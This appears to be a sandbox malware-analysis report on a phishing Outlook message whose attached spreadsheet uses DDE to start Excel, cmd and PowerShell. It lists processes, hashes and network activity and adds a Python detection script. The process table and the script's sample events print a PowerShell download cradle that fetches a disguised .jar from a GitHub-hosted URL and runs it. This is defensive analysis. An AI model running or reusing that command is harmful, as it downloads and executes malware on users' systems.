| Field | Value |
|---|---|
| File name | Administrator Notification_ Redirecting email with malware.msg |
| Full analysis | https://app.any.run/tasks/23bd7236-6071-4343-8ae5-1fc5385e8882 |
| Verdict | Malicious activity |
| Analysis date | October 09, 2019, 13:08:11 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators | |
| MIME | application/vnd.ms-outlook |
| File info | CDFV2 Microsoft Outlook Message |
| MD5 | C4F4B9B591B8F72A0933E2A980858774 |
| SHA1 | 6E43807CCA6B51F6FFBD8D4BF5D79237D226E5F6 |
| SHA256 | 30E3C0EB8A405B523C59E11E89FFD17C643AFDA375839C985013EAA1F4B20CD1 |
| SSDEEP | 3072:9AEgTcrQVr9O5w52Ai6LXqOnFQi+BHDDD3r:CcMVh5iyXqOqiiDDDb |
File type identification:

| Extension | Description | Match (%) |
|---|---|---|
| .msg | Outlook Message | 58.9 |
| .oft | Outlook Form Template | 34.4 |
Processes:

| PID | Parent process | Command line | Path | Indicators | Process details |
|---|---|---|---|---|---|
| 2816 | explorer.exe | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Administrator Notification_ Redirecting email with malware.msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | — | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Outlook; Version: 14.0.6025.1000 |
| 2572 | OUTLOOK.EXE (2816) | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000 |
| 3084 | EXCEL.EXE (2572) | CMD.EXE /c powershell -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/773480834/3497cm47rvty1rg/gh-pages/08l534ulvt.xls\" ,\" %tmp%\\I52tGC.jar\") }" & %tmp%\\I52tGC.jar | C:\Windows\system32\CMD.EXE | — | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 3720 | CMD.EXE (3084) | powershell -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/773480834/3497cm47rvty1rg/gh-pages/08l534ulvt.xls\" ,\" C:\Users\admin\AppData\Local\Temp\\I52tGC.jar\") }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2760 | CMD.EXE (3084) | "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\I52tGC.jar" | C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe | — | User: admin; Company: Oracle Corporation; Integrity Level: MEDIUM; Description: Java(TM) Platform SE binary; Exit code: 0; Version: 8.0.920.14 |

Reading the tree top to bottom: Outlook opens the .msg, Excel is started by Outlook with the /dde switch (a DDE launch from the attached spreadsheet), Excel spawns cmd.exe, cmd.exe runs PowerShell, and PowerShell fetches a file that is served under an .xls name from raw.githubusercontent.com but written to %TMP% as I52tGC.jar. cmd.exe then runs that .jar through the file association, which resolves to javaw.exe. Every process runs at MEDIUM integrity as the logged-in user; no privilege escalation is recorded.
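The chain in the process table is the kind of thing a detection rule should catch without needing the specific URL or file name. The script below is an added example, not part of this report or of ANY.RUN's tooling: it replays the report's PIDs, parents and command lines as constructed process-creation events (the pid / ppid / image / cmd record layout and the rule names are assumptions made for the example; explorer.exe is given a made-up PID 1000 because the report does not list one) and flags four things visible above: an Office parent anywhere above a shell, Excel started with /dde, a WebClient.DownloadFile whose URL extension differs from the extension it is saved under, and javaw -jar on a file in the temp directory.

```python
"""Process-tree triage for an Office -> shell -> download -> javaw chain.

Added example, not part of the sandbox report. EVENTS is constructed from
the process table in the report; the record layout and rule names are
assumptions made for this example.
"""
import re
from urllib.parse import urlparse

OFFICE = {"outlook.exe", "excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed sample events mirroring the report's process tree.
EVENTS = [
    {"pid": 1000, "ppid": 0, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 2816, "ppid": 1000,
     "image": r"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE",
     "cmd": r'"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Administrator Notification_ Redirecting email with malware.msg"'},
    {"pid": 2572, "ppid": 2816,
     "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmd": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde'},
    {"pid": 3084, "ppid": 2572, "image": r"C:\Windows\system32\CMD.EXE",
     "cmd": r'CMD.EXE /c powershell -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/773480834/3497cm47rvty1rg/gh-pages/08l534ulvt.xls\" ,\" %tmp%\\I52tGC.jar\") }" & %tmp%\\I52tGC.jar'},
    {"pid": 3720, "ppid": 3084,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/773480834/3497cm47rvty1rg/gh-pages/08l534ulvt.xls\" ,\" C:\Users\admin\AppData\Local\Temp\\I52tGC.jar\") }"'},
    {"pid": 2760, "ppid": 3084,
     "image": r"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe",
     "cmd": r'"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\I52tGC.jar"'},
]


def basename(path):
    """Last path component, lower-cased; accepts either slash style."""
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1].lower()


def ext(path):
    """Lower-cased extension of the last path component, or '' if none."""
    base = basename(path)
    return base.rsplit(".", 1)[-1] if "." in base else ""


def ancestry(events, pid):
    """Image basenames from pid up to the root, child first (cycle-safe)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


URL_RE = re.compile(r'https?://[^\s"\\]+', re.I)
# Destination argument of DownloadFile(url, dest); tolerates the \" escaping
# that the command line carries when PowerShell is launched via cmd.exe.
DEST_RE = re.compile(r'DownloadFile\(.*?,\s*\\?"\s*([^"]+?)\\?"\s*\)', re.I)


def extract_download(cmd):
    """Return (url, destination) for a WebClient.DownloadFile call, else None."""
    if "downloadfile" not in cmd.lower():
        return None
    url, dest = URL_RE.search(cmd), DEST_RE.search(cmd)
    if not url or not dest:
        return None
    return url.group(0), dest.group(1).strip()


def triage(events):
    """Apply the four rules; return (pid, rule, evidence) tuples."""
    findings = []
    for e in events:
        name, cmd = basename(e["image"]), e["cmd"]
        chain = ancestry(events, e["pid"])
        if name in SHELLS and any(p in OFFICE for p in chain[1:]):
            findings.append((e["pid"], "office-spawned-shell", " <- ".join(chain)))
        if name == "excel.exe" and re.search(r"\s/dde\b", cmd, re.I):
            findings.append((e["pid"], "excel-dde-launch", cmd))
        dl = extract_download(cmd)
        if dl and ext(urlparse(dl[0]).path) != ext(dl[1]):
            findings.append((e["pid"], "download-extension-mismatch", f"{dl[0]} -> {dl[1]}"))
        if name == "javaw.exe" and "-jar" in cmd.lower() and re.search(r"\\temp\\|%tmp%", cmd, re.I):
            findings.append((e["pid"], "jar-from-temp", cmd))
    return findings


if __name__ == "__main__":
    for pid, rule, evidence in triage(EVENTS):
        print(f"{pid}\t{rule}\t{evidence}")
```

Run against the constructed events this yields six findings: the DDE launch on 2572, office-spawned-shell plus the .xls-to-.jar mismatch on both 3084 and 3720, and jar-from-temp on 2760. The ancestry walk is what makes the shell rule robust: powershell.exe's direct parent is cmd.exe, so a rule that only looks one level up would miss it.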
Files:

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2816 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR2D9E.tmp.cvr | — | — | — |
| 2816 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DF7E6FE25C82C6FF11.TMP | — | — | — |
| 2816 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\N7CO2YHC\Siparis (2).xls\:Zone.Identifier:$DATA | — | — | — |
| 2572 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRABE6.tmp.cvr | — | — | — |
| 3720 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZYEKY07DS0869C5OM41U.temp | — | — | — |
| 2816 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | 74BCA61AB8ED1FA6A3BAFD9A9FCEA026 | 270729F05C7ADE676E89FBD74210D16D8211CFB7CA10E48996E8CB44D179D4DA |
| 3720 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | A670ADD3BF0A1901BD12CC7C4CD70086 | 98E5263D6949B8F81010D65760BB299D37BCF272CE0FFDF5668E2D5CC1545986 |
| 2816 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\N7CO2YHC\Selam ACIL KONTROL EDIN .msg | msg | 1DD951854BB96C71428C29BFF63EF7F1 | AB45E257547AE621F3EAF931592BA439F2AD2DAE46A82D0C945E87B25DE0F2F6 |
| 2816 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_2E25B9F57B733D4499A493454E0F3809.dat | xml | EEAA832C12F20DE6AAAA9C7B77626E72 | C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16 |
| 2816 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\N7CO2YHC\Siparis (2).xls | text | 3A8487DA8953DE0A886EC784F2AC5941 | E0DE585E7C5270C7F36AFC2F013AA5DF64EC507F67C15C912C23B0ACF0EE4845 |

Two of the dropped names are Turkish: "Siparis" (sipariş) means "order", and "Selam ACIL KONTROL EDIN" means "Hi, CHECK URGENTLY"; the analysed message carries a forwarded message with that subject. Note that Siparis (2).xls is typed as text rather than as an Excel workbook, consistent with a DDE payload in a plain-text file that Excel opens by extension, and that Outlook wrote a Zone.Identifier alternate data stream on it (Mark-of-the-Web). The downloaded I52tGC.jar itself does not appear in this file list.
Network connections:

| PID | Process | IP:port | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 3720 | powershell.exe | 151.101.0.133:443 | raw.githubusercontent.com | Fastly | US | malicious |
| 2816 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
DNS requests:

| Domain | IP | Reputation |
|---|---|---|
| config.messenger.msn.com | | whitelisted |
| raw.githubusercontent.com | | shared |